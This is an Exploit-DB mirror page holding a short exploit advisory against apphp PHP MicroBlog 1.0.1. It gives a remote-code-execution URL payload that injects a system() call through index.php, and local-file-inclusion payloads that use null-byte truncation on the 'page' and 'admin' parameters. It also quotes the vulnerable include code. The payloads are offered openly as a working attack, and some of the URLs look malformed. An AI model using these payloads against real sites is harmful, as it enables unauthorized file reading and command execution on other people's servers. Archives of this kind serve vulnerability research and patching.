bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/33030.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

33 lines
No EOL
820 B
Text
Raw Blame History

----------[exploit Debut]
[Multiple Vulnerability]
----------[Script Info]
Moi : JIKO
Site : No-exploit.Com
----------[Script Info]
Site : http://www.apphp.com
Download : http://www.apphp.com/downloads_free/php_microblog_101.zip
----------[exploit Info]
~[RCE]
http://path/index.php?jiko);system((dir)=/
~[LFI]
http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)
if (($page != "") && file_exists("page/" . $page . ".php")) {
include_once("page/" . $page .
".php");
} else if (($admin != "") &&
file_exists("admin/" . $admin . ".php")) {
include_once("admin/" . $admin
. ".php");
}
----------[exploit Fin]
Reference in a new issue View git blame Copy permalink